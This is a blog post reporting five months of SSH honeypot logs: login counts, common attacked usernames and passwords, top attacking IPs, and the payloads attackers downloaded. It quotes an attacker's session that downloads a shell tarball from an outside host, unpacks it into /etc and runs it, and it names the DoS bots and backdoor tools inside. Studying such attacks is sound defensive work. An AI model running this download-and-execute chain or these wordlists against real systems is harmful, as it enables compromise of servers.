I ran Kippo on an overpriced cheap VPS with two-IPs pretty much continuously from between April and September 2013. That’s 5 months (154 days). I wrote a short post near the beginning of that time. In my original post on this subject I waffled a bit about how almost all of the attacking traffic I saw was from Chinese IPs and mentioned a few attempted passwords with high entropy. In this post I want to summarise what I saw over the full 5 month period.
First, credentials. The honeypot was configured with a single user account
root and the password
In the time the honeypot was running, I logged 71,264 login attempts – about 463 per day (not all that many, really), and of those attempts 395 were successful.
The most attempted username was
root, and sorted by number of attempts, the top ten usernames were:
44193 root 819 bin 657 test 554 oracle 343 nagios 240 user 227 postgres 189 guest 187 admin 157 apache
It’s interesting that
postgres all appear more frequently than
www-data (which is even further down the list). Could these indicate a general lack of good security practices on some database and monitoring servers? In that case, where’s MySQL?
Counts of password attempts were spread more evenly than usernames, and the most attempted passwords were
password. The list below shows the top ten:
1661 changeme 1475 123456 1023 password 930 1234 839 abc123 627 test 599 12345 420 123 327 qwerty 227 111111
This really has to be about the worst possible wordlist. In all, the logs contain login attempts with 6,122 distinct usernames and 18,561 different passwords.
I wrote about some of the higher entropy passwords in my last post, highlighting a few of the more interesting strings, but this time some were even more strange.
Some of the password strings with the highest entropy, according to Data::Password::Entropy are:
khaled-dico-ana-wla-akhou-charmouta-feh-kess-ekhtak-bi-ayri-a5ou-a7beh sss!Qazxsw22243s2lakeprostsssz1,zPlastaicatraglake efwef58sdf2cvsd1*!#&$#_)claudia69iLiE Fum4tulP0@t3Uc1d3R4uD3T0t!@#$%^%^&*? khaled-dico-ana-wla-akhou-charmouta-tfeh-kess-ekhtak-bi-ayri-a5ou-a7beh 1$EdkQIoSn$T3gzKLxlcxF7tsTCFqC8M 209*7fdlkdf%0@)(fUF786__fdk^%^Djfdsahfdsf886D&S%*fd dragomirdumitru1q2w3e4r5tsfgdfhvd!Q@W#E$Rsdfdf B*(&%^#$SSH?M?a+k3f123!^*backIleSSH@q!@#D ortega.123#TradeLinuxKi!l|iN6#Th3h03$%nix@NdR3b!irD
Bizarre! I find it hard to believe that real-life systems are compromised using these passwords, so I suspect that as I said in my previous post they’re either set by other tools, or perhaps they’re some sort of strange meme which is gradually propagating through script kiddie’s word lists.
I also find the idea that they’re ‘vanity strings’ unlikely, but like the idea that there are thousands of Chinese script kiddies running SSH scanners solely to get into geek’s blog posts.
As before, Chinese IPs are dominant, but there’s also a significant amount of traffic from South America and from cheap hosting companies elsewhere. Here’s a list of the top ten individual IPs and country information:
7129 18.104.22.168 China 2978 22.214.171.124 China 2230 126.96.36.199 China 2153 188.8.131.52 China 2153 184.108.40.206 Brazil 2150 220.127.116.11 Germany 1883 18.104.22.168 Chile 1847 22.214.171.124 Japan 1556 126.96.36.199 China 1438 188.8.131.52 China
I don’t think there’s anything surprising there.
Downloads & Sessions
There wasn’t much download activity, which is interesting and probably indicates that lots of SSH scanners just run unattended on large blocks and their owners check the results later. Or it could indicate a lack of realism in my honeypot setup.
Over the entire time the honeypot was running there were 25 downloads in total. Most of these were tarballs of scanning tools, but four of the 25 were cachefly test files and Microsoft service packs. In these cases I think the attackers were probably intending to use the system in DoS attacks, and were using the big downloads to judge available bandwidth.
Here’s an example terminal session:
wget http://cachefly.cachefly.net/100mb.test cd /etc; wget http://rootnr1.net76.net/shell.tgz; tar xvf shell.tgz; rm -rf shell.tgz; cd rc.9; chmod +x * ./go
… at this point kippo starts playing games with the user and they invariably log off but I still have the files to play with. In this case, the payload contains several shell and perl scripts and a lot of pre-compiled binaries, all of which are unpacked into a directory called
The perl scripts include Hawker Hunter v2.0, an IRC bot with port scanning and DoS capabilities and another DoS tool which contains the string “GlobaL Team atack victim” (sic).
Running strings on the binaries reveals some interesting, if dated things. For example, one of the files
Hide - Process Faker, by Schizoprenic Xnuxer Research (c) 2002
stream.c v1.0 - TCP Packet Storm
Which, according to this mailing list post from 2000 might exploit an old DoS vulnerability in FreeBSD, Solaris and Linux. It’s not clear to me if this is still relevant on modern systems, and if not this payload could have been around for ages. In fact, one of the most noticeable aspects of the payloads I saw was their age; everything’s old!.
Shall we play a game?
Other payloads I saw included a couple of backdoored SSH daemons, one of which includes the amazingly named
openssh-3.6.1p2-backdoor.patch, and a few different IRC bots and bouncers, such as PyBNC.
The contents of these other downloads are interesting enough to be the subject of another post (in another year?!), so I’ll leave with this recorded terminal session: